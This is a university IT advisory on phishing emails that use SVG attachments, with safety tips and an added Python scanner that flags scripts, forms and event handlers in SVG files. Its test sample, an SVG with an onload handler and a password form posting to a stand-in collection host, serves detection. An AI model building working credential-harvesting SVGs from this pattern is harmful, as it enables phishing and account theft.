Overview:
Phishing emails using SVG attachments pose a significant security risk by bypassing traditional detection methods. Understanding how these files work and following best practices can help safeguard the university's security along with your own.
The Risk:
Hackers are attaching Scalable Vector Graphics (SVG) files to phishing emails. These attachments are used to:
- Display phishing forms that steal user credentials.
- Deploy malware to victims’ systems.
- Evade detection by security software.
SVG attachments are uncommon in legitimate emails and should raise suspicion if received unexpectedly.
What Are SVG Files?
SVG files are a type of image file based on object-oriented graphics, as opposed to bit-mapped formats like JPG, PNG, BMP, and TIF. Unlike bit-mapped files, which use pixels to form images, SVG files use mathematical formulas to create shapes, lines, and text.
Since SVGs are text-based, they can include embedded scripts, such as JavaScript, enabling interactive elements like clickable forms or automated redirects. Bad actors can exploit this format to deliver harmful code to your computer if you access one of these files.
Example SVG code:
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
<rect x="10" y="10" width="100" height="50" fill="blue" />
<circle cx="160" cy="40" r="40" fill="red" />
<text x="50" y="130" font-size="20" fill="black">Hello, SVG!</text>
</svg>
When opened in a browser, the code above generates a rectangle, a circle, and text.
Example of Malicious SVG:
The following links are to attached images that display what you would see if you were emailed an SVG file used in a phishing attack. When opened, it pretends to be a legitimate Excel document but includes a fake login form asking for your email and password. If you enter your details, they are sent directly to the attacker. This type of attachment is deceptive and should not be trusted. Always verify emails and avoid entering credentials in unexpected forms.
This is an example of how an SVG may appear as an attachment (with a properties window open beside it).
This is an example of an Excel file that would appear when opening a malicious SVG file.
How Threat Actors Use SVG Attachments:
- Phishing Forms: SVG attachments can display fake login forms to collect user credentials.
  Example: A fake Excel spreadsheet prompting users to log in, which sends credentials to attackers.
- Malware Delivery: SVG attachments may contain links or scripts that download malicious files when clicked or opened.
- Automatic Redirects: Embedded scripts in SVGs can redirect users to phishing websites without requiring any user interaction. Simply opening the file may trigger a redirect to a malicious site, making these attachments highly deceptive and dangerous.
Why SVGs Evade Detection:
- SVG files are primarily text-based and often bypass security software designed to scan traditional image formats.
- Security software detection rates for malicious SVG files are low, often identifying only 1-2 threats out of multiple samples.
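Because an SVG is XML text, an attachment can be checked for the active content described above (scripts, embedded forms, event handlers, link targets) without rendering it. The Python below is an added example, not part of the original advisory; the function name `scan_svg`, the tag and attribute lists, and the second sample are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Elements that make an "image" interactive: scripts, embedded HTML, forms.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "form", "input"}
URL_ATTRS = {"href", "src", "action"}
# Script URLs, remote targets, and data: URLs that are not plain images.
RISKY_URL = re.compile(r"(javascript:|https?:|data:(?!image/))")

def local(name):
    return name.rsplit("}", 1)[-1].lower()  # drop ElementTree's '{namespace}' prefix

def scan_svg(data: bytes) -> list:
    """Return a list of findings; an empty list means no active content seen."""
    # Refuse entity declarations up front instead of letting the parser expand
    # them (this byte check assumes an ASCII-compatible encoding).
    if re.search(rb"<!ENTITY", data, re.I):
        return ["entity declaration (not parsed)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr = local(name)
            # Browsers ignore whitespace/control characters inside a URL scheme.
            val = re.sub(r"[\s\x00-\x1f]+", "", value).lower()
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{tag}>")
            elif attr in URL_ATTRS and RISKY_URL.match(val):
                findings.append(f"{attr} on <{tag}> uses {val.split(':')[0]}: URL")
    return findings

# The page's harmless sample (shortened), and a constructed sample with placeholders.
BENIGN = b'''<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
<rect x="10" y="10" width="100" height="50" fill="blue" />
<text x="50" y="130" font-size="20" fill="black">Hello, SVG!</text></svg>'''
SUSPICIOUS = b'''<svg xmlns="http://www.w3.org/2000/svg" onload="/* placeholder */">
<script>/* constructed placeholder */</script>
<foreignObject width="300" height="200">
<form xmlns="http://www.w3.org/1999/xhtml" action="https://collect.example.invalid/">
<input name="password" type="password"/></form></foreignObject></svg>'''

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_svg(sample))
```

An empty result only means none of these markers were found; an unexpected SVG attachment should still be treated as suspicious.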
How to Stay Safe:
- Treat SVG Attachments as Suspicious:
  - Legitimate emails rarely include SVG attachments.
  - If you’re not expecting such files, delete the email immediately.
- Avoid Clicking Unknown Links:
  - Never click on links or forms embedded in SVG attachments.
- Enable Email Security Measures:
  - Ensure your email client is configured to block suspicious attachments.
  - Use email filters to detect and quarantine potential phishing attempts.
- Use Advanced Security Tools:
  - Employ antivirus software and tools that specifically monitor unusual email attachments.
- Report Suspicious Emails:
  - If you receive an email with an SVG attachment or suspect it to be phishing:
    Contact the SLU IT Service Desk immediately.
    Phone: 314-977-4000
    Email: ask@slu.edu
    Create a ticket via the AskSLU Service Portal: ask.slu.edu